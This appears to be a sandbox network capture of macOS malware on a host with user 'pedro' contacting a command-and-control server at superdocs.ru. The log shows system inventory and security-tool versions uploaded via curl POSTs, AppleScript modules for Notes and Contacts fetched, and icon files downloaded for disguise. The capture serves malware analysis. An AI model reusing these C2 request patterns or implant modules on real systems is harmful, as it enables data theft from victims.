2022-08-24 09:19:10 UTC	131	OUT	POST /agent/upload.php?serial=C07GV0KZPJH8 HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Users: pedro X-Mod: listing Content-Length: 414 Content-Type: multipart/form-data; boundary=------------------------c6e6676243f6cffe
2022-08-24 09:19:10 UTC	131	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 36 65 36 36 37 36 32 34 33 66 36 63 66 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 69 73 74 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 46 61 72 6f 6e 69 63 73 0a 47 61 72 61 67 65 42 61 6e 64 2e 61 70 70 0a 4b 65 79 6e 6f 74 65 2e 61 70 70 0a 4e 75 6d 62 65 72 73 2e 61 70 70 0a 50 61 67 65 73 2e 61 70 70 0a 50 79 74 68 6f 6e 20 32 2e 37 0a 53 61 66 61 72 69 2e 61 70 70 0a 55 74 69 6c 69 74 69 65 73 0a 69 4d 6f 76 69 65 2e 61 70 70 0a 0d 0a Data Ascii: --------------------------c6e6676243f6cffeContent-Disposition: form-data; name="file"; filename="list.log"Content-Type: application/octet-streamFaronicsGarageBand.appKeynote.appNumbers.appPages.appPython 2.7Safari.appUtilitiesiMovie.app
2022-08-24 09:19:10 UTC	131	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:10 UTC	132	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.0.53	49323	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:11 UTC	132	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 76 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:11 UTC	132	OUT	Data Raw: 73 74 61 72 74 69 6e 67 20 73 65 72 76 65 72 20 75 70 6c 6f 61 64 20 66 6f 72 20 41 70 70 6c 69 63 61 74 69 6f 6e 73 5f 53 79 73 74 65 6d 2e 74 78 74 2e 20 45 78 70 65 63 74 65 64 20 66 69 6c 65 20 73 69 7a 65 3a 20 31 20 4d 42 Data Ascii: starting server upload for Applications_System.txt. Expected file size: 1 MB
2022-08-24 09:19:11 UTC	132	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:11 UTC	132	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.0.53	49325	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:11 UTC	132	OUT	POST /agent/upload.php?serial=C07GV0KZPJH8 HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Users: pedro X-Mod: listing Content-Length: 802 Content-Type: multipart/form-data; boundary=------------------------6a3b18fc97995ca5
2022-08-24 09:19:11 UTC	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 61 33 62 31 38 66 63 39 37 39 39 35 63 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 69 73 74 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 41 70 70 20 53 74 6f 72 65 2e 61 70 70 0a 41 75 74 6f 6d 61 74 6f 72 2e 61 70 70 0a 42 6f 6f 6b 73 2e 61 70 70 0a 43 61 6c 63 75 6c 61 74 6f 72 2e 61 70 70 0a 43 61 6c 65 6e 64 61 72 2e 61 70 70 0a 43 68 65 73 73 2e 61 70 70 0a 43 6f 6e 74 61 63 74 73 2e 61 70 70 0a 44 69 63 74 69 6f 6e 61 72 79 2e 61 70 70 Data Ascii: --------------------------6a3b18fc97995ca5Content-Disposition: form-data; name="file"; filename="list.log"Content-Type: application/octet-streamApp Store.appAutomator.appBooks.appCalculator.appCalendar.appChess.appContacts.appDictionary.app
2022-08-24 09:19:11 UTC	133	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:11 UTC	133	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.0.53	49324	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:12 UTC	133	OUT	POST /agent/scripts/notes_app.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:12 UTC	133	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:13 UTC	133	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:13 UTC	133	IN	Data Raw: 32 35 39 32 0d 0a 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 67 6c 6f 62 61 6c 20 70 65 72 6d 69 73 73 69 6f 6e 41 70 70 0a 67 6c 6f 62 61 6c 20 46 4f 52 43 45 44 0a 67 6c 6f 62 61 6c 20 6e 6f 74 65 73 46 6f 6c 64 65 72 0a 67 6c 6f 62 61 6c 20 72 65 74 72 69 65 73 43 6f 75 6e 74 0a 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 6e 6f 74 65 73 5f 61 70 70 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 Data Ascii: 2592global moduleNameglobal userNameglobal dFolderglobal permissionAppglobal FORCEDglobal notesFolderglobal retriesCountset moduleName to "notes_app"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text)

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.0.53	49326	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:13 UTC	143	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 65 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:13 UTC	143	OUT	Data Raw: 73 74 61 72 74 69 6e 67 20 73 65 72 76 65 72 20 75 70 6c 6f 61 64 20 66 6f 72 20 58 70 72 6f 74 65 63 74 2e 74 78 74 2e 20 45 78 70 65 63 74 65 64 20 66 69 6c 65 20 73 69 7a 65 3a 20 31 20 4d 42 Data Ascii: starting server upload for Xprotect.txt. Expected file size: 1 MB
2022-08-24 09:19:13 UTC	143	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:13 UTC	143	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.0.53	49327	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:14 UTC	143	OUT	POST /agent/upload.php?serial=C07GV0KZPJH8 HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Users: pedro X-Mod: listing Content-Length: 318 Content-Type: multipart/form-data; boundary=------------------------adbb862677104671
2022-08-24 09:19:14 UTC	144	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 64 62 62 38 36 32 36 37 37 31 30 34 36 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 78 70 72 6f 74 65 63 74 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 32 31 36 32 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 64 62 62 38 36 32 36 37 37 31 30 34 36 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d Data Ascii: --------------------------adbb862677104671Content-Disposition: form-data; name="file"; filename="xprotect.log"Content-Type: application/octet-stream2162--------------------------adbb862677104671Content-Disposition: form-data; name="filename"
2022-08-24 09:19:14 UTC	144	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:14 UTC	144	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.0.53	49328	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:15 UTC	144	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 62 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:15 UTC	144	OUT	Data Raw: 73 74 61 72 74 69 6e 67 20 73 65 72 76 65 72 20 75 70 6c 6f 61 64 20 66 6f 72 20 6f 73 6d 72 74 2e 74 78 74 2e 20 45 78 70 65 63 74 65 64 20 66 69 6c 65 20 73 69 7a 65 3a 20 31 20 4d 42 Data Ascii: starting server upload for osmrt.txt. Expected file size: 1 MB
2022-08-24 09:19:16 UTC	144	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:16 UTC	144	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.0.53	49329	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:16 UTC	144	OUT	POST /agent/upload.php?serial=C07GV0KZPJH8 HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Users: pedro X-Mod: listing Content-Length: 310 Content-Type: multipart/form-data; boundary=------------------------ec548427d7e6bb91
2022-08-24 09:19:16 UTC	145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 63 35 34 38 34 32 37 64 37 65 36 62 62 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6d 72 74 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 31 2e 39 33 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 63 35 34 38 34 32 37 64 37 65 36 62 62 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 6f 73 Data Ascii: --------------------------ec548427d7e6bb91Content-Disposition: form-data; name="file"; filename="mrt.log"Content-Type: application/octet-stream1.93--------------------------ec548427d7e6bb91Content-Disposition: form-data; name="filename"os
2022-08-24 09:19:16 UTC	145	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:16 UTC	145	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.0.53	49330	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:17 UTC	145	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:17 UTC	145	OUT	Data Raw: 6d 6f 64 75 6c 65 20 66 69 6e 69 73 68 65 64 Data Ascii: module finished
2022-08-24 09:19:17 UTC	145	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:17 UTC	145	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.0.53	49304	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:18:44 UTC	15	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 58 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:18:44 UTC	15	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 2e 20 63 6f 6e 6e 52 65 74 72 69 65 73 3a 20 30 2e 20 55 73 65 64 20 64 6f 6d 61 69 6e 3a 20 73 75 70 65 72 64 6f 63 73 2e 72 75 Data Ascii: module launched. connRetries: 0. Used domain: superdocs.ru
2022-08-24 09:18:44 UTC	15	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:18:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:18:44 UTC	15	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.0.53	49331	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:18 UTC	145	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:18 UTC	146	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:18 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:18 UTC	146	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:18 UTC	162	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.0.53	49333	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:21 UTC	176	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: notes_app Content-Length: 30 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:21 UTC	177	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 2e 20 46 4f 52 43 45 44 3a 20 66 61 6c 73 65 Data Ascii: module launched. FORCED: false
2022-08-24 09:19:22 UTC	177	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:22 UTC	177	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.0.53	49332	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:23 UTC	177	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 44 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:23 UTC	177	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 6e 6f 74 65 73 5f 61 70 70 20 2d 20 63 6f 6d 2e 6d 65 74 61 6c 2e 63 6f 72 65 2e 64 6f 63 6b 2e 61 70 70 Data Ascii: mapping: notes_app - com.metal.core.dock.app
2022-08-24 09:19:23 UTC	177	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:23 UTC	177	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.0.53	49334	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:23 UTC	177	OUT	GET /agent/bin/icons.php?icon=Reminders HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:23 UTC	177	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:23 GMT Content-Type: application/octet-stream Content-Length: 50910 Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename="Reminders.icns" Expires: 0 Cache-Control: must-revalidate Pragma: public
2022-08-24 09:19:23 UTC	178	IN	Data Raw: 69 63 6e 73 00 00 c6 de 54 4f 43 20 00 00 00 30 69 73 33 32 00 00 01 be 73 38 6d 6b 00 00 01 08 69 63 31 31 00 00 05 88 69 63 30 37 00 00 32 d1 69 63 31 33 00 00 8b 87 69 73 33 32 00 00 01 be 8e 00 03 09 bc f2 fd 83 ff 06 fe f4 c5 18 00 00 bd 89 ff 06 c8 00 00 f1 84 67 82 86 fe 07 f4 00 00 fc 6a 01 65 fe 81 c6 0a c7 c7 c6 c6 fd 00 00 fd 8c 75 88 87 fd 01 00 00 8b fc 05 00 00 fc f1 ea f0 87 fc 07 00 00 fb f9 fa f9 fb c3 80 c4 09 c5 c4 c4 c3 fb 00 00 fa fa fb 88 fa 01 00 00 8b f9 05 00 00 f7 ed e6 ed 86 f8 07 f7 00 00 eb f4 f5 f4 f6 81 c0 09 c1 c0 c0 bf ed 00 00 ba f5 f6 87 f5 06 c3 00 00 11 b9 e9 f2 84 f4 02 ea c0 24 8e 00 8e 00 03 09 bc f2 fd 83 ff 06 fe f4 c5 18 00 00 bd 89 ff 06 c8 00 00 f1 ba a6 b8 86 fe 07 f4 00 00 fb af 7b ac fd 81 c5 0a c6 c6 c5 c5 Data Ascii: icnsTOC 0is32s8mkic11ic072ic13is32gjeu${
2022-08-24 09:19:23 UTC	193	IN	Data Raw: ef ef bf ff 97 bf fc e5 7d 57 5e 79 e5 01 f0 ae 01 20 7a 56 b1 8c 0b cf 2c 10 38 5e ef 64 15 61 f4 9c 04 80 a8 46 9c 6b c7 f1 8b 39 7d 7a e1 c2 85 e9 5b 6e b9 e5 b4 c5 8b 17 5f 82 91 fd a5 70 f8 33 81 82 23 77 92 12 0d 14 d3 00 c6 ab dc e3 23 23 23 37 ef df bf ff 97 1f fe f0 87 ef ba ee ba eb 38 ab e1 4c 21 2e 18 cc 20 10 38 5e ef 64 8b 31 92 04 80 18 cd 94 70 7c ce 97 18 0c d2 0f 3d f4 d0 09 ab 56 ad 7a 4b 63 63 e3 5b 30 55 5f 1c 83 26 29 4a 34 30 2d 0d 60 84 df 3f 36 36 f6 a3 6d db b6 5d 07 9b fa 0d 1a d1 75 35 18 e8 99 b8 a6 11 08 1c af 77 b2 6c 1c 97 aa 11 00 2a bf c8 88 93 6c 16 65 74 7c 26 af a9 4e ef b9 1e e7 51 73 f2 c9 27 d7 ed dc b9 f3 f5 13 13 13 b7 3c ef 79 cf 7b a0 b9 b9 f9 43 89 f3 cf 42 d1 49 93 90 06 60 72 9d 98 3d be 6b e5 ca 95 b7 60 b9 Data Ascii: }W^y zV,8^daFk9}z[n_p3#w###78L!. 8^d1p\|=VzKcc[0U_&)J40-`?66m]u5wl*let\|&NQs'<y{CBI`r=k`
2022-08-24 09:19:23 UTC	209	IN	Data Raw: f7 4c c8 33 fb f0 e5 f0 d7 fc b3 ac ba e8 bd 21 50 f7 42 0d 8a c6 6b 3b 97 b5 4a 27 3c 03 72 db d9 7c 29 dd 14 42 87 4b 94 46 b8 b4 94 ce 22 90 11 47 e6 5d 98 6c 64 04 8e b6 e0 b5 eb 20 45 78 70 9a a9 7e 4c cb 68 ff 46 6d 23 d2 df 6e db 00 a5 a5 19 5f 47 a8 a9 79 0a 70 05 b9 a9 97 20 01 ac 9f 0b f1 3b 45 5f 1a 58 13 35 fc e6 9a 69 68 ac fc 1e 40 4c 28 53 f2 e5 3c ab 80 ee 59 3b c4 2d d3 3c 95 a6 f9 3c 8c cf 85 65 15 a7 fe 41 3d 3b 97 30 9b ef f9 96 ec b8 03 ce 8f e5 bd ef fc 27 bd 53 f2 17 7d 15 ce bf d4 b6 31 b7 6d 82 b6 a3 fd bb 65 60 d7 06 19 da bf 0d 28 49 97 b8 ed ed 46 43 a3 eb 64 fc 38 c8 7f 00 e1 cb 24 35 67 81 9c b0 bc 56 d6 00 d5 73 ff f3 bf a4 77 c3 9d 0e 1f c8 3a 3c 91 9f 30 df 4a 13 d8 a1 75 3a 95 bd dd c4 72 37 cf 6b 57 5e 6d 17 39 3b b7 49 Data Ascii: L3!PBk;J'<r\|)BKF"G]ld Exp~LhFm#n_Gyp ;E_X5ih@L(S<Y;-<<eA=;0'S}1me`(IFCd8$5gVsw:<0Ju:r7kW^m9;I
2022-08-24 09:19:23 UTC	225	IN	Data Raw: b4 d0 64 c2 a9 c3 67 83 91 13 7a a3 e2 84 a4 af 42 9e 50 e8 b7 79 8b 87 7e 9c f4 7c 12 60 01 64 39 95 bd e2 e9 36 94 d3 22 9b e4 27 c7 86 e3 a4 fa ae b6 e1 a1 13 d1 c2 05 65 c7 8e bb b6 5d 75 d5 95 e7 bc f9 cd 6f f9 48 bc a5 e2 a7 bc d8 79 bc f3 d7 c4 f7 ae 5f 93 3f 97 5c f8 2f 76 df 0f dc 65 af 5a 00 98 e0 83 1f fa 30 e6 d5 17 11 c0 55 17 81 4c fa 80 79 21 70 7f cd e1 87 1f be fe fd 27 bf ef 37 9f fe cb 4f ff dd b5 fb ef ff d3 81 93 c1 d6 6b d8 8e 8f a7 11 41 20 b5 a0 ec 09 a9 e4 1c 3f 2b 80 8f 02 89 5b 7a fd 2d 3e 07 56 06 2a 6f 1a 42 44 87 a9 ed 7e 0d 2e 60 14 c1 08 b0 d6 26 21 07 78 a2 e4 f3 03 7c 03 2e 17 b4 e6 d9 30 02 3e 7e 10 65 be c1 35 71 49 74 7f d9 26 5f 8b 16 9b e1 21 7c 73 4b 0d a2 e3 9a 29 d0 02 08 86 12 16 1a f9 a7 ea 22 fd c0 d2 c2 24 3b Data Ascii: dgzBPy~\|`d96"'e]uoHy_?\/veZ0ULy!p'7OkA ?+[z->V*oBD~.`&!x\|.0>~e5qIt&_!\|sK)"$;

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.0.53	49335	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:24 UTC	227	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: notes_app Content-Length: 40 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:24 UTC	228	OUT	Data Raw: 77 61 69 74 69 6e 67 20 66 6f 72 20 20 4e 6f 74 65 73 2e 61 70 70 20 74 6f 20 62 65 20 6c 61 75 6e 63 68 65 64 2e 2e 2e Data Ascii: waiting for Notes.app to be launched...
2022-08-24 09:19:24 UTC	228	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:24 UTC	228	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.0.53	49336	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:27 UTC	228	OUT	POST /agent/scripts/contacts.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:27 UTC	228	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:27 UTC	228	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
